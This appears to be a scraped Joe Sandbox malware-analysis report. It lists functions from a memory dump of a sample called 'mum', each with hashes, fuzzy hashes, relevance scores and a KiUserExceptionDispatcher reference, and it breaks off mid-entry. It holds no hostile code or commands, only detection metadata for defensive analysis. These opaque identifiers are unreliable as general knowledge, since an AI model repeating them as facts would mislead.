Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1a6f67ff3e62cf144631fb62dd5114a6e85a6370c7c456430d39127567d1d72d
Instruction ID: 724c078513cf69044d079cd1ad1b6aa8784c520fab0fabe88a6d50bf57f6f0fc
Opcode Fuzzy Hash: 1a6f67ff3e62cf144631fb62dd5114a6e85a6370c7c456430d39127567d1d72d
Instruction Fuzzy Hash: 29C1C474E00218CFDB14DFA5C994B9DBBB2BF89305F2091AAD809AB395DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E8270 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E833B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a72842bc3abfaedc244cf2576415f95dcfd0811405a8dedcb19500242e211e9b
Instruction ID: 2a3a3f97c4eacc214ab79f65fa1f77149aa2f80113c29b54e8334fb2b6092502
Opcode Fuzzy Hash: a72842bc3abfaedc244cf2576415f95dcfd0811405a8dedcb19500242e211e9b
Instruction Fuzzy Hash: 4AC1C474E00218CFDB14DFA5C994B9DBBB2BF89304F2081A9D509AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E7568 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7633

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 760dbc2453cdcece27c2e83d90dfd2055a40f9eda7d8ba3aec58870c6485ef7f
Instruction ID: dc8b12af586040d84dff1a604ade65ba7e6df49c50687fd7a60b6beb10ef0865
Opcode Fuzzy Hash: 760dbc2453cdcece27c2e83d90dfd2055a40f9eda7d8ba3aec58870c6485ef7f
Instruction Fuzzy Hash: B6C1D374E04218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB395DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E5258 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E5323

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7e8664d86187af1daf54a53e43768a488f54a554c1d2866d391d98091c4b67f1
Instruction ID: e6c2c8c6508a7e61a228782a173634817e9e6213d57a05b907fc60c43cf3ea91
Opcode Fuzzy Hash: 7e8664d86187af1daf54a53e43768a488f54a554c1d2866d391d98091c4b67f1
Instruction Fuzzy Hash: 45C1C374E00218CFDB14DFA5C994B9DBBB2BF89305F2091AAD809AB395DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E1A58 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E1B23

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c177bcf36b4f1fb8af08d9bd1ce9b462f7333a3b60670bb08aa864d9b0b55d6a
Instruction ID: a30110309f5e7930890a636f3ef2c33d04c4f5eaccf658f0c0e853fd5485a038
Opcode Fuzzy Hash: c177bcf36b4f1fb8af08d9bd1ce9b462f7333a3b60670bb08aa864d9b0b55d6a
Instruction Fuzzy Hash: 3CC1E274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E0D50 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E0E1B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 586cf8b6c933999fe103951c2a5dca4b0183090ffa5b2ae4ca30c9fae3039c6b
Instruction ID: 0a2597c3e193c6ffc32816bcb1d2b77e62e8d1d7ca7be18c80fbe38b7210f66b
Opcode Fuzzy Hash: 586cf8b6c933999fe103951c2a5dca4b0183090ffa5b2ae4ca30c9fae3039c6b
Instruction Fuzzy Hash: 4FC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E0048 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E0113

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cfa1e4c523b0416a2420874676059c20943c6a4ba00dd8469f4fa6b227c8fa10
Instruction ID: 7445e6a62c8da8c80c64174fe691537198ff6b0067fc6a12292e698684a445e0
Opcode Fuzzy Hash: cfa1e4c523b0416a2420874676059c20943c6a4ba00dd8469f4fa6b227c8fa10
Instruction Fuzzy Hash: 48C1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB395DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E11A8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E1273

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a60f30cba82d5a383c6fc8db38ac57df7677b9e27a0dde236d9d4c04e55e76db
Instruction ID: 55d4f1cc346b6e1d0b37e39ec9690d1f80a5820824bdf6af84e928f5c37b9fb7
Opcode Fuzzy Hash: a60f30cba82d5a383c6fc8db38ac57df7677b9e27a0dde236d9d4c04e55e76db
Instruction Fuzzy Hash: 0CC1D574E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD409AB395DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E04A0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E056B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: acbd453096f4406c082c955f18f15fba9bb057b183a0379ddd72cf4c62767253
Instruction ID: 63a093c0617b7e5ee1e5583797da46acca22d267cff5af52f80e959c1c60e69e
Opcode Fuzzy Hash: acbd453096f4406c082c955f18f15fba9bb057b183a0379ddd72cf4c62767253
Instruction Fuzzy Hash: 0CC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E6C90 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6D5B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 390d3c547ffeea856a5bcee5858fe68e8c4b69f61a789a0ce0021c17502e1ba9
Instruction ID: f8a4efb1294f37caf50d75473f11540ef4c466f7e37e122f8cb1a2f78e99ed5b
Opcode Fuzzy Hash: 390d3c547ffeea856a5bcee5858fe68e8c4b69f61a789a0ce0021c17502e1ba9
Instruction Fuzzy Hash: 9AC1C374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E5F88 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6053

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4e85f1fc359d7c08ccff073c64d1b2c8e96c6615c1a0a21f38318cb768a662ac
Instruction ID: c1786ad1ec2ca0c7a7750c971302f01b593fc05fd66104d56e432f5dce7ce6ba
Opcode Fuzzy Hash: 4e85f1fc359d7c08ccff073c64d1b2c8e96c6615c1a0a21f38318cb768a662ac
Instruction Fuzzy Hash: 55C1D274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E08F8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E09C3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0e77b455129147220ea5fb5e74d29bacc0846c54462c2a59a313e93e04fae247
Instruction ID: a7c4a0061a2b32c12801607ab725f9c662281332dc4c1291d173f05a74d47a1d
Opcode Fuzzy Hash: 0e77b455129147220ea5fb5e74d29bacc0846c54462c2a59a313e93e04fae247
Instruction Fuzzy Hash: 45C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E63E0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E64AB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b9709a917877acf534f744d746d72af71f13ed354d832a3c713ac9d79e6357e9
Instruction ID: a336e784ce53f41f9ec037eb9935e190b7ada704c7cc1580d7edc26693933b22
Opcode Fuzzy Hash: b9709a917877acf534f744d746d72af71f13ed354d832a3c713ac9d79e6357e9
Instruction Fuzzy Hash: 6CC1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E56D8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E57A3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e268a699d46039f25c1258196bb7e542cfdc288b7f7bedbfef9219448f84ecda
Instruction ID: 00664a540e2bea15fcd2569e9012871119b7c975feec58de256d19cbad486211
Opcode Fuzzy Hash: e268a699d46039f25c1258196bb7e542cfdc288b7f7bedbfef9219448f84ecda
Instruction Fuzzy Hash: 49C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E86C8 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E8793

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a1307d403566582905d079a3cfd4dac6d052ff808d4b8fedd01a272fb5710d8
Instruction ID: 23a2da39bbba9219e795699491093666d38d04292a00c667f644145bf5af70a0
Opcode Fuzzy Hash: 6a1307d403566582905d079a3cfd4dac6d052ff808d4b8fedd01a272fb5710d8
Instruction Fuzzy Hash: 81C1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E79C0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7A8B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0718b98a28a58c785b94a73b161c2d32990d61edf88b9285fa57352c62b3ce18
Instruction ID: 5a01ee526826a293951cccd2c066a6f2fa9607a768250fbc5b9d2085a0c9e3b1
Opcode Fuzzy Hash: 0718b98a28a58c785b94a73b161c2d32990d61edf88b9285fa57352c62b3ce18
Instruction Fuzzy Hash: FCC1D274E04218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E0012 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E0113

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 327ef6235f69647b834d45b5dbbfa8161470ff362c9f6c84b98994dbf91f38c4
Instruction ID: 482ed84b7f4cde037b3590db775ac1002a5e397027488a7077ab8d0f71e02e52
Opcode Fuzzy Hash: 327ef6235f69647b834d45b5dbbfa8161470ff362c9f6c84b98994dbf91f38c4
Instruction Fuzzy Hash: 62412770D05288CFDB19DFBAD85069EBBF2AF89300F24C16AC454AB3A6DB344949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E5B20 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E5BFB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 673a29a24863855621f9d247660cfadf48dfd4dadd803f4d407fc637582d9dab
Instruction ID: 9fc04f0faca88b31784a3eee57d518e198046e82a81c4d294b573e057cfa5180
Opcode Fuzzy Hash: 673a29a24863855621f9d247660cfadf48dfd4dadd803f4d407fc637582d9dab
Instruction Fuzzy Hash: AF41E270E05648CFDB19DFBAC4516DEBBF2AF89304F24D12AD414AB2A9DB34494ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E6828 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6903

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ca565a1a6472bcbf2703f931cc1bac00d247bb0bfe714315ecb1446acaac7dd7
Instruction ID: 69e9c71d6c41ab508a6f51dae87aa4a56ee92d9ec22816c31f81ffcadc3a5910
Opcode Fuzzy Hash: ca565a1a6472bcbf2703f931cc1bac00d247bb0bfe714315ecb1446acaac7dd7
Instruction Fuzzy Hash: A2410470E01248CFDB19DFAAD5516EEBBF2AF89304F24D12AD418BB265DB340949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E63D1 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E64AB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 563a84027ab6a03460b64560f726485dd0aa25c4d3e0c36736c82f65648197e6
Instruction ID: 20f4ed6f423583f65066de5b2d2fcc1f50ae1a5e9bb2cd6d311237122ed1ef00
Opcode Fuzzy Hash: 563a84027ab6a03460b64560f726485dd0aa25c4d3e0c36736c82f65648197e6
Instruction Fuzzy Hash: AB41F370E05258CBDB19DFBAC45169EBBB2AF89304F24D12AD414AB2A5DB344949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E5F78 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6053

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5f1048ae10296d3853f4f96fe2dc3153c90ad90ed81166ee7558f0d5ce41aa16
Instruction ID: 2cfdd8258451646be53157539c6965c6ef00c9e8cef6ca9f5d04c5fc54c37af4
Opcode Fuzzy Hash: 5f1048ae10296d3853f4f96fe2dc3153c90ad90ed81166ee7558f0d5ce41aa16
Instruction Fuzzy Hash: 6441F374E01248CBDB19DFAAC9416DEBBF2AF89300F24D22AD415AB3A5DB345949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E8260 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E833B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bee3032c6a6c83fc575f700493e7b9190e1353806700548a3dd7ef81cd485f9b
Instruction ID: bea9bbf92323d7a329f8f164a64e1fec27b176ecad1fb56ad2091052b40f1951
Opcode Fuzzy Hash: bee3032c6a6c83fc575f700493e7b9190e1353806700548a3dd7ef81cd485f9b
Instruction Fuzzy Hash: 5841F370E01248CBDB19DFAAC5546DEBBF2AF89304F24D12AC518BB2A5DB34494ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 003E7558 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7633

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 05b920d76540c4c54921b27dd86806357722c1b5f59d2b33b815ff1b75a7e884
Instruction ID: 1aeca36c57aac577f8ac273b5176b15a51721689247aaccd1521e656c7981c52
Opcode Fuzzy Hash: 05b920d76540c4c54921b27dd86806357722c1b5f59d2b33b815ff1b75a7e884
Instruction Fuzzy Hash: 5A41F570D04248CBDB19DFAAC4546EEFBF2AF89300F24C12AD414BB699EB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E79B1 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7A8B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ab725ea721b9d75e73531b506c9be29f286ff236a47cf4d8866d5d5047c5f7a6
Instruction ID: c40b506ed808c592b4aaad713294ba0a9cfb38fa7bdfa9a8618a5e18986f6305
Opcode Fuzzy Hash: ab725ea721b9d75e73531b506c9be29f286ff236a47cf4d8866d5d5047c5f7a6
Instruction Fuzzy Hash: 5141F170E04248CFDB19DFAAC8556EEBBF2AF89300F24C12AD405AB6A9DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E86B8 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E8793

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7a1639baa132af5bf45de9bf92e4b9a8d83adad9d56381ebcd873d70d0d59328
Instruction ID: b20924d2f033b3926ed54b0c85097f150c352447464e3738ecdf41228963897f
Opcode Fuzzy Hash: 7a1639baa132af5bf45de9bf92e4b9a8d83adad9d56381ebcd873d70d0d59328
Instruction Fuzzy Hash: 2A410570D04248CFDB19DFAAC4516EEBBF2AF89300F24C12AD418BB2A5DB345949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 003E6C80 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6D5B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8b5985c06ee794782feb8540624457be632884323a779af5f8cfb4bc751fa73f
Instruction ID: 99fa36b854fa32a5b29ccf97aa6ddf2d447d81aa50d360649145664e2dc1d97e
Opcode Fuzzy Hash: 8b5985c06ee794782feb8540624457be632884323a779af5f8cfb4bc751fa73f
Instruction Fuzzy Hash: C441E270E05248CBDB19DFAAC8416EEFBB6AF89300F24D12AD414BB3A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E08E8 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E09C3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 065479fb2ef8798c7e0015c09b59a2df17beec12eade81774041ab475b24660e
Instruction ID: c9398ecce0c2e7ed8d09986aada2184d0cde396fc702c0facc2bf26211bccc41
Opcode Fuzzy Hash: 065479fb2ef8798c7e0015c09b59a2df17beec12eade81774041ab475b24660e
Instruction Fuzzy Hash: FC411370E05248CFDB19DFAAC85069EFBB2AF89304F24D22AC414BB2A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E7E09 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7EE3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f93af0e86dd06514624545684be563f838474aa6ceddff16e69d4ad9e186739f
Instruction ID: 8446fdc71c11f0b44ab0656476618b2b482dfaadd6477dbe5accc9f13d34a2d8
Opcode Fuzzy Hash: f93af0e86dd06514624545684be563f838474aa6ceddff16e69d4ad9e186739f
Instruction Fuzzy Hash: 9841F670E01258CFDB18DFAAC5516AEFBF2AF88300F24D12AD519BB2A5DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E7102 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E71DC

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 70bcd7d7c11ec77769449c87be733bc7ef02a89db4ba0277ea063d768c1cb7dd
Instruction ID: 9b20df78056e16779b72a5f70c251bc190f4f1b4750760265ca525cebb2c360a
Opcode Fuzzy Hash: 70bcd7d7c11ec77769449c87be733bc7ef02a89db4ba0277ea063d768c1cb7dd
Instruction Fuzzy Hash: 89410470D05248CFDB19DFAAD9546EEFBF2AF89300F24D12AD414AB2A9DB345945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003E1198 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E1273

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b1d1c29b7147beac30b72cf58853a3adbd9dbf8efce25443417f66e55c881ec4
Instruction ID: 2c95b6fdf2f3bb72eb7978eef414ad82aedb9fd6e7ca754d5d89a2e8355b7bc1
Opcode Fuzzy Hash: b1d1c29b7147beac30b72cf58853a3adbd9dbf8efce25443417f66e55c881ec4
Instruction Fuzzy Hash: 2E41E270E01248CBDB19DFAAC85469EFBF2AF89300F24C12AD415BB3A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E0490 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E056B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 60fd63970c8429f12863c2bd5dbfd93cd8f702d269f4536ef8af1ca13f9375fb
Instruction ID: 3e1f58e4060de554ed9c21a54d30b9a89ef10aca7883e8b75e347f526da44642
Opcode Fuzzy Hash: 60fd63970c8429f12863c2bd5dbfd93cd8f702d269f4536ef8af1ca13f9375fb
